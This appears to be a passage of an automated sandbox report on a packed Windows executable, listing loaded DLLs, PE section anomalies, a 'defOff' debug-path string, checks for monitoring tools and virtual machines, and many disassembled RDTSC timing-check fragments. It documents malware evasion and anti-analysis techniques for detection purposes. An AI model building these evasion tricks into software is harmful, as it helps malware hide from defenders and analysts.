Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Section loaded: policymanager.dll
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Section loaded: msvcp110_win.dll
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Section loaded: ieframe.dll
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Section loaded: netapi32.dll
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Section loaded: wkscli.dll
Source: Google Drive.lnk.4.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.4.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.4.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.4.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.4.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.4.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window Recorder Window detected: More than 3 window changes detected
Source: 0zBsv1tnt4.exe Static file information: File size 2997760 > 1048576
Source: 0zBsv1tnt4.exe Static PE information: Raw size of section xkuacxgz (0x2b2200) is bigger than 0x100000
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 0zBsv1tnt4.exe, 00000000.00000002.1877383452.0000000006512000.00000040.00000800.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Unpacked PE file: 0.2.0zBsv1tnt4.exe.950000.0.unpack :EW;.rsrc :W;.idata :W;xkuacxgz:EW;pzmqirjh:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;xkuacxgz:EW;pzmqirjh:EW;.taggant:EW;
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: 0zBsv1tnt4.exe Static PE information: real checksum: 0x2e58ac should be: 0x2dfedd
Source: 0zBsv1tnt4.exe Static PE information: section name:
Source: 0zBsv1tnt4.exe Static PE information: section name: .rsrc
Source: 0zBsv1tnt4.exe Static PE information: section name: .idata
Source: 0zBsv1tnt4.exe Static PE information: section name: xkuacxgz
Source: 0zBsv1tnt4.exe Static PE information: section name: pzmqirjh
Source: 0zBsv1tnt4.exe Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_3_014EC414 push 70800091h; ret 0_3_014EC419
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_3_014F57D1 push cs; iretd 0_3_014F57D2
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_3_014F1775 push es; ret 0_3_014F1792
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_00987069 push es; retf 0_2_00987074
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_0098C990 push eax; mov dword ptr [esp], 5C5D5E5Fh 0_2_0098C99E
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_009939A1 push es; ret 0_2_009939A2
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Code function: 0_2_0096B324 push F3B90099h; retf 0_2_0096B32A
Source: 0zBsv1tnt4.exe Static PE information: section name: entropy: 7.97845575818733

Boot Survival

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Window searched: window name: Filemonclass
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B5A1EF second address: B5A1FD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007FC22CC1B8A6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B5A1FD second address: B5A20A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B5A20A second address: B5A229 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ecx 0x0000000a popad 0x0000000b nop 0x0000000c mov di, 4BD1h 0x00000010 xchg eax, ebx 0x00000011 jc 00007FC22CC1B8CBh 0x00000017 push eax 0x00000018 push edx 0x00000019 js 00007FC22CC1B8A6h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B5A229 second address: B5A24C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B5A24C second address: B5A250 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B5C30C second address: B5C310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B5C310 second address: B5C32A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jp 00007FC22CC1B8A6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B5CEA8 second address: B5CEAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B5E4F9 second address: B5E515 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC22CC1B8B7h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B5E24D second address: B5E25C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007FC22D01ECC6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B5E25C second address: B5E26A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007FC22CC1B8A6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B5E515 second address: B5E590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007FC22D01ECC8h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 push 00000000h 0x00000026 mov esi, ecx 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push ebp 0x0000002d call 00007FC22D01ECC8h 0x00000032 pop ebp 0x00000033 mov dword ptr [esp+04h], ebp 0x00000037 add dword ptr [esp+04h], 00000016h 0x0000003f inc ebp 0x00000040 push ebp 0x00000041 ret 0x00000042 pop ebp 0x00000043 ret 0x00000044 mov si, 79B7h 0x00000048 mov edi, ecx 0x0000004a xchg eax, ebx 0x0000004b jng 00007FC22D01ECD5h 0x00000051 jmp 00007FC22D01ECCFh 0x00000056 push eax 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a pushad 0x0000005b popad 0x0000005c je 00007FC22D01ECC6h 0x00000062 popad 0x00000063 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B5EDB3 second address: B5EDBD instructions: 0x00000000 rdtsc 0x00000002 js 00007FC22CC1B8A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B5FA16 second address: B5FA32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007FC22D01ECCCh 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f pushad 0x00000010 popad 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B5FA32 second address: B5FA36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B6249C second address: B624AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B624AC second address: B624B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B6029E second address: B602A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B629F0 second address: B629F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B63AF9 second address: B63AFE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B64A48 second address: B64A4E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B63C8A second address: B63C92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B64A4E second address: B64AB0 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC22CC1B8B2h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jnc 00007FC22CC1B8B8h 0x00000011 nop 0x00000012 movsx ebx, ax 0x00000015 push 00000000h 0x00000017 mov ebx, 1AE51155h 0x0000001c push 00000000h 0x0000001e call 00007FC22CC1B8B8h 0x00000023 mov dword ptr [ebp+12465916h], ebx 0x00000029 pop ebx 0x0000002a xchg eax, esi 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B64AB0 second address: B64AB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B64AB4 second address: B64ABE instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC22CC1B8A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B64ABE second address: B64AC9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FC22D01ECC6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B65D02 second address: B65D07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B65D07 second address: B65D0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B67BD9 second address: B67BDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B68D3F second address: B68D45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B68D45 second address: B68D49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B68D49 second address: B68DA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov dword ptr [ebp+122D2593h], esi 0x00000011 push 00000000h 0x00000013 sub dword ptr [ebp+122D37FAh], eax 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push eax 0x0000001e call 00007FC22D01ECC8h 0x00000023 pop eax 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 add dword ptr [esp+04h], 00000018h 0x00000030 inc eax 0x00000031 push eax 0x00000032 ret 0x00000033 pop eax 0x00000034 ret 0x00000035 mov bx, 2D10h 0x00000039 xchg eax, esi 0x0000003a jmp 00007FC22D01ECD8h 0x0000003f push eax 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 popad 0x00000045 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B69F03 second address: B69F14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC22CC1B8AAh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B68FAE second address: B68FB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B68FB4 second address: B68FCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC22CC1B8ACh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B68FCB second address: B68FCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B68FCF second address: B68FD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B6AF57 second address: B6AF5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B6AF5D second address: B6AF61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B6AF61 second address: B6AFCA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov ebx, dword ptr [ebp+122D2008h] 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007FC22D01ECC8h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 00000015h 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d pushad 0x0000002e js 00007FC22D01ECC8h 0x00000034 mov bl, A4h 0x00000036 mov dword ptr [ebp+122D27BAh], eax 0x0000003c popad 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push ebp 0x00000042 call 00007FC22D01ECC8h 0x00000047 pop ebp 0x00000048 mov dword ptr [esp+04h], ebp 0x0000004c add dword ptr [esp+04h], 00000018h 0x00000054 inc ebp 0x00000055 push ebp 0x00000056 ret 0x00000057 pop ebp 0x00000058 ret 0x00000059 xchg eax, esi 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e pushad 0x0000005f popad 0x00000060 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B6AFCA second address: B6AFD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B6C105 second address: B6C176 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FC22D01ECC8h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 jnc 00007FC22D01ECD4h 0x00000016 nop 0x00000017 push 00000000h 0x00000019 push eax 0x0000001a call 00007FC22D01ECC8h 0x0000001f pop eax 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 add dword ptr [esp+04h], 00000015h 0x0000002c inc eax 0x0000002d push eax 0x0000002e ret 0x0000002f pop eax 0x00000030 ret 0x00000031 push 00000000h 0x00000033 mov edi, 49C10FD6h 0x00000038 push 00000000h 0x0000003a call 00007FC22D01ECD5h 0x0000003f mov dword ptr [ebp+122D1F5Dh], edi 0x00000045 pop ebx 0x00000046 xchg eax, esi 0x00000047 pushad 0x00000048 push eax 0x00000049 push edx 0x0000004a ja 00007FC22D01ECC6h 0x00000050 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B6C176 second address: B6C1A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FC22CC1B8A8h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 js 00007FC22CC1B8D6h 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FC22CC1B8B4h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B6D12F second address: B6D17A instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC22D01ECC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b nop 0x0000000c movsx edi, dx 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007FC22D01ECC8h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 00000015h 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b add dword ptr [ebp+122DBBADh], esi 0x00000031 push 00000000h 0x00000033 pushad 0x00000034 mov di, 1C52h 0x00000038 mov dx, di 0x0000003b popad 0x0000003c push eax 0x0000003d jnp 00007FC22D01ECD0h 0x00000043 pushad 0x00000044 pushad 0x00000045 popad 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B6E1FA second address: B6E1FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B6E1FE second address: B6E259 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECCAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FC22D01ECCFh 0x0000000e popad 0x0000000f nop 0x00000010 mov dword ptr [ebp+122D295Bh], eax 0x00000016 push 00000000h 0x00000018 xor bx, CA00h 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push edi 0x00000022 call 00007FC22D01ECC8h 0x00000027 pop edi 0x00000028 mov dword ptr [esp+04h], edi 0x0000002c add dword ptr [esp+04h], 00000015h 0x00000034 inc edi 0x00000035 push edi 0x00000036 ret 0x00000037 pop edi 0x00000038 ret 0x00000039 sub dword ptr [ebp+122DBB93h], ecx 0x0000003f xchg eax, esi 0x00000040 push edi 0x00000041 push eax 0x00000042 push edx 0x00000043 jng 00007FC22D01ECC6h 0x00000049 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B6E407 second address: B6E429 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007FC22CC1B8B1h 0x00000011 pushad 0x00000012 push edx 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B6E429 second address: B6E491 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 sub dword ptr [ebp+124579F1h], edi 0x0000000d push dword ptr fs:[00000000h] 0x00000014 pushad 0x00000015 jmp 00007FC22D01ECD3h 0x0000001a jne 00007FC22D01ECCCh 0x00000020 popad 0x00000021 and bx, A100h 0x00000026 mov dword ptr fs:[00000000h], esp 0x0000002d mov dword ptr [ebp+122D25A2h], eax 0x00000033 mov eax, dword ptr [ebp+122D1245h] 0x00000039 sub dword ptr [ebp+122D38FCh], ecx 0x0000003f push FFFFFFFFh 0x00000041 jmp 00007FC22D01ECCCh 0x00000046 mov ebx, esi 0x00000048 push eax 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B7039B second address: B703A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FC22CC1B8A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B703A5 second address: B70413 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC22D01ECC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov edi, dword ptr [ebp+122D2EBBh] 0x00000015 push dword ptr fs:[00000000h] 0x0000001c pushad 0x0000001d movzx eax, dx 0x00000020 movsx ebx, ax 0x00000023 popad 0x00000024 mov dword ptr fs:[00000000h], esp 0x0000002b push 00000000h 0x0000002d push edi 0x0000002e call 00007FC22D01ECC8h 0x00000033 pop edi 0x00000034 mov dword ptr [esp+04h], edi 0x00000038 add dword ptr [esp+04h], 00000016h 0x00000040 inc edi 0x00000041 push edi 0x00000042 ret 0x00000043 pop edi 0x00000044 ret 0x00000045 mov ebx, ecx 0x00000047 jp 00007FC22D01ECCBh 0x0000004d sub bx, F935h 0x00000052 mov eax, dword ptr [ebp+122D0009h] 0x00000058 mov dword ptr [ebp+122D2135h], edi 0x0000005e push FFFFFFFFh 0x00000060 add bx, 9145h 0x00000065 nop 0x00000066 pushad 0x00000067 push edi 0x00000068 push eax 0x00000069 push edx 0x0000006a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B70413 second address: B70435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jo 00007FC22CC1B8A8h 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC22CC1B8B1h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B721B7 second address: B721BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B16254 second address: B1625A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B1625A second address: B16282 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jng 00007FC22D01ECDCh 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007FC22D01ECD4h 0x00000016 push ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
